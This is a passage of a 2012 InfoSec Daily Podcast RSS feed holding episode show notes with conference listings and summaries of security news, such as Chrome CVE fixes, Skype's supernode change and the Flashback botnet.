<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Also over the weekend, Iranian state-sponsored news media said officials had identified the hackers responsible for the original round of attacks aimed at the country&#39;s oil infrastructure. &quot;The nature of the attack and the agents behind it have been identified, but because we are still working on the case, it cannot be announced,&quot;</span><a href="http://presstv.com/detail/238793.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Press TV</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> quoted deputy oil minister Hamdollah Mohammadnejad saying on Saturday.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://expertmiami.blogspot.co.uk/2012/05/skype-does-away-with-random-supernodes.html"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://expertmiami.blogspot.co.uk/2012/05/skype-does-away-with-random-supernodes.html</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A major change in the Skype network architecture has occurred two or three weeks ago (at the time I wrote this), and has gone unnoticed as far as I know. The number of supernodes has dropped from 48k+ to 10k+, and all the supernodes are now hosted by Microsoft/Skype. Promotion of random eligible nodes to supernodes has stopped (through the setting of the global boolean 33h).</span></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Ironically, those remaining supernodes run on grsec&#39;ed Linux boxes (I hope Spender gets a sizeable donation from Microsoft). They can host a considerable amount of clients, ~100000.</span></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">At the same time, the number of online Skype users jumped (</span><a href="http://skypejournal.com/blog/2012/04/23/skype-topped-41-5-million-concurrent-users-online-today-chart/"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://skypejournal.com/blog/2012/04/23/skype-topped-41-5-million-concurrent-users-online-today-chart/</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">) and can now reach 41M at peak hours.</span></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">This will likely ensure that former outages (</span><a href="http://articles.latimes.com/2010/dec/23/business/la-fi-skype-20101223"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://articles.latimes.com/2010/dec/23/business/la-fi-skype-20101223</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">) don&#39;t happen again, and gives MS a better control over the network.</span></b></div>
<p><b id="internal-source-marker_0.08266157028265297"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Edit: dead link, so here is the original graph from Skype Journal:</span><img height="515px;" src="https://lh4.googleusercontent.com/X3muIbs3Vi3wuUEzqXCRFdfLuugTpqfSIzYCvUOh_0FBkvbbMTioMEX38cAJX-5dQIaOcn7JPSAY87xXi6KBASV3ZXB9-XMlga83A_m5DWl6O_JdgUs" width="668px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Edit: supernodes list as of May 1st 2012: </span><a href="http://pastebin.com/LgWsPUGe"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://pastebin.com/LgWsPUGe</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Edit: Microsoft confirms (</span><a href="http://arstechnica.com/business/news/2012/05/skype-replaces-p2p-supernodes-with-linux-boxes-hosted-by-microsoft.ars"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://arstechnica.com/business/news/2012/05/skype-replaces-p2p-supernodes-with-linux-boxes-hosted-by-microsoft.ars</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">):</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">As part of our ongoing commitment to continually improve the Skype user experience, we developed supernodes which can be located on dedicated servers within secure datacentres. This has not changed the underlying nature of Skype&rsquo;s peer-to-peer (P2P) architecture, in which supernodes simply allow users to find one another (calls do not pass through supernodes). We believe this approach has immediate performance, scalability and availability benefits for the hundreds of millions of users that make up the Skype community.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/google-fixes-five-bugs-chrome-18-050212"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://threatpost.com/en_us/blogs/google-fixes-five-bugs-chrome-18-050212</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Google has fixed five security vulnerabilities in its Chrome browser, including three high-severity flaws. One of the less-severe vulnerabilities fixed in Chrome 18 is a race condition in the browser&#39;s sandbox.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">This round of</span><a href="http://googlechromereleases.blogspot.com/2012/04/stable-channel-update_30.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+GoogleChromeReleases+%28Google+Chrome+Releases%29"><span style="font-size: 13px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> patches in Chrome</span></a><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> is one of the rare occasions when the company didn&#39;t have to pay out much in the way of rewards to researchers who reported vulnerabilities. Only one bug, a use-after-free flaw, earned a reward. That was a $1,000 payout for a researcher named Miaubiz, who has earned quite a number of bug bounties from Google in the last couple of years.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The flaw reported by Miaubiz is one of the three high-severity vulnerabilities fixed in this version of Chrome. The other two are also use-after-free flaws, one in the XML parser and the other in floats handling.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Here&#39;s the full list of fixes in Chrome 18:</span></b></div>
<ul style="margin-top: 0pt; margin-bottom: 0pt; ">
<li style="list-style-type: disc; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="vertical-align: baseline; white-space: pre-wrap; ">[</span><a href="https://code.google.com/p/chromium/issues/detail?id=106413"><span style="color: rgb(17, 85, 204); vertical-align: baseline; white-space: pre-wrap; ">106413</span></a><span style="vertical-align: baseline; white-space: pre-wrap; ">] High CVE-2011-3078: Use after free in floats handling. Credit to Google Chrome Security Team (Marty Barbella) and independent later discovery by miaubiz.</span></b></div>
</li>
<li style="list-style-type: disc; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="vertical-align: baseline; white-space: pre-wrap; ">[</span><a href="https://code.google.com/p/chromium/issues/detail?id=117110"><span style="color: rgb(17, 85, 204); vertical-align: baseline; white-space: pre-wrap; ">117110</span></a><span style="vertical-align: baseline; white-space: pre-wrap; ">] High CVE-2012-1521: Use after free in xml parser. Credit to Google Chrome Security Team (SkyLined) and independent later discovery by &nbsp;wushi of team509 reported through iDefense VCP (V-874rcfpq7z).</span></b></div>
</li>
<li style="list-style-type: disc; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="vertical-align: baseline; white-space: pre-wrap; ">[</span><a href="https://code.google.com/p/chromium/issues/detail?id=117627"><span style="color: rgb(17, 85, 204); vertical-align: baseline; white-space: pre-wrap; ">117627</span></a><span style="vertical-align: baseline; white-space: pre-wrap; ">] Medium CVE-2011-3079: IPC validation failure. Credit to PinkiePie.</span></b></div>
</li>
<li style="list-style-type: disc; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="vertical-align: baseline; white-space: pre-wrap; ">[</span><a href="https://code.google.com/p/chromium/issues/detail?id=121726"><span style="color: rgb(17, 85, 204); vertical-align: baseline; white-space: pre-wrap; ">121726</span></a><span style="vertical-align: baseline; white-space: pre-wrap; ">] Medium CVE-2011-3080: Race condition in sandbox IPC. Credit to Willem Pinckaers of Matasano.</span></b></div>
</li>
</ul>
<ul style="margin-top: 0pt; margin-bottom: 0pt; ">
<li style="list-style-type: disc; font-size: 13px; vertical-align: baseline; ">
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="vertical-align: baseline; white-space: pre-wrap; ">[$1000] [</span><a href="https://code.google.com/p/chromium/issues/detail?id=121899"><span style="color: rgb(17, 85, 204); vertical-align: baseline; white-space: pre-wrap; ">121899</span></a><span style="vertical-align: baseline; white-space: pre-wrap; ">] High CVE-2011-3081: Use after free in floats handling.</span></b></div>
</li>
</ul>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.08266157028265297"><span style="font-size: 13px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">[end]</span></b></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-658-esx-patch-healthcare-struggles-iran-admits-to-attacks-skype-supernodes-and-chrome/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3882/0/infosec-daily-podcast-episode-658.mp3" length="19413873" type="audio/mpeg" />
		<itunes:duration>0:40:24</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 658 for May 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19,[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 658 for May 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org

	
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/

	
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014

	
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training

	
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com

	
Please consider making your Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.

	
Stories
Source: &#160;http://www.h-online.com/security/news/item/VMware-patches-vulnerabilities-in-ESX-4-1-1564129.html
Virtualization specialist VMware is warning customers about multiple security holes in versions 4.0 and 4.1 of its ESX enterprise-level computer virtualization product.
According to the company, the Service Console in ESX 4.1 on unpatched systems can be exploited by a local user in a guest virtual machine to gain escalated privileges, or by a malicious remote user to cause a denial-of-service (DoS) condition or compromise a victim&#39;s system. In its advisory, VMware notes that some of these holes, found in previous versions of the libxml2 XML C parser and toolkit used by the ESX Console Operating System (COS), have been closed by updating libxml2 to a newer release.
Versions 4.0 and 4.1 of ESX are affected; vCenter, ESXi and ESX 3.5 as well as hosted products such as VMware Workstation, Player, ACE and Fusion are not vulnerable. Patches are available for ESX 4.1 that correct these problems, while patches for version 4.0 are listed as &#34;pending&#34;.
Further information about the vulnerabilities can be found in the company&#39;s security advisory.
&#8230;.
Source: &#160;http://www.darkreading.com/insider-threat/167801100/security/news/232901235/healthcare-unable-to-keep-up-with-insider-threats.html
April has been a brutal month for healthcare, with three major breaches disclosed accounting for nearly 1.1 million records lost. The thread woven throughout each has been the role of insiders &#8212; both malicious and inept &#8212; in triggering the incidents.
In one case at the Utah Department of Health, approximately 780,000 Medicaid records were exposed due to the misconfiguration of a server containing these files. Human error also accounted for the loss of 315,000 patient records at Emory Healthcare, when 10 backup disks went missing from a storage facility at Emory University Hospital. Meanwhile at South Carolina&#39;s Department of Health and Human Services, an employee sent 228,000 Medicaid patient records to himself via email. The investigation is still ongoing, but already the employee, Ch[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 657 &#8211; Flashbuck Trojan, Google Cleared, Mozilla Forced Upgrade, 10 Things, and Support SNOPA!</title>
		<link>http://www.isdpodcast.com/episode-657-flashbuck-trojan-google-cleared-mozilla-forced-upgrade-10-things-and-support-snopa</link>
		<comments>http://www.isdpodcast.com/episode-657-flashbuck-trojan-google-cleared-mozilla-forced-upgrade-10-things-and-support-snopa#comments</comments>
		<pubDate>Wed, 02 May 2012 01:02:30 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3875</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 657 for May 1, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Themson Mester. Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012 Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center &#160;- Huntington, [...]]]></description>
			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 657 for May 1, 2012. </span><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Themson Mester.</span></b></p>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Announcements</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">GraniteSec (formerly The New England InfoSec Tweetup)<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;May 19, 2012<br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br />
	</span><a href="http://granitesec.org/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://granitesec.org</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">AIDE 2012<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 21-25, 2012<br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br />
	</span><a href="http://www.appyide.org/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.appyide.org/</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">LayerOne 2012<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 26-27, 2012<br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br />
	</span><a href="http://www.layerone.org/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.layerone.org</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: June 20 &#8211; 27, 2012<br />
	Where: Courtyard Seattle Federal Way, WA <br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=28014</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Social Engineering Training</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: August 20-24, 2012<br />
	Where: &nbsp;Bristol, UK</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD<br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.social-engineer.com/social-engineer-training</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Inside and Out of the Social-Engineer Toolkit (SET)<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21 &#8211; 22, 2012<br />
	When: July 23 &#8211; 24, 2012<br />
	Where: Black Hat Vegas<br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012<br />
	Where: Louisville, KY<br />
	</span><a href="http://www.derbycon.com/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Skydogcon<br />
	</span><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: October 26-28<br />
	Where: Hotel Preston in Nashville, TN <br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Or simply use our QR Code Links.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon:<br />
	</span><img height="135px;" src="https://lh4.googleusercontent.com/n3UEZtam7AhtIpBDtIEGdmCuUIdKk0igUylwHufYc1iOEjdSVvkHzqPrdydaergDj7Yw3dFonHFrDkR-QSMm4olYdNAeVd3mS4tBO7hIW7pGTyWMQas" width="135px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:<br />
	</span><img height="138px;" src="https://lh4.googleusercontent.com/1UIgX8GN49uCAmANMuWDMr8gOyA-Q6TLxF20-FxFbU8RIdFFBnZJzjEs9xgLo_RA95QSmYC4kjr79Wfdd_xnTopC5KCJ4LA4EHTJmT9iBUqxU0CWduI" width="138px;" /></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></div>
<p><b id="internal-source-marker_0.941816410748288"><br />
	</b></p>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="https://www.zdnet.com/blog/security/mac-botnet-generated-10000-a-day-for-flashback-gang/11727"><span style="font-size: 16px; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">https://www.zdnet.com/blog/security/mac-botnet-generated-10000-a-day-for-flashback-gang/11727</span></a></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Security researchers at Symantec are estimating that the cyber-criminals behind the Flashback Mac OS X botnet may have raked in about $10,000 a day.</span></b></div>
<div dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.941816410748288"><span style="font-size: 16px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In a new blog post that discusses the business model of the botnet, Symantec found that Flashback was robbing Google of advertising dollars by redirecting clicks from infected Mac OS X machines and stealing the ad revenue.</span></b></div>
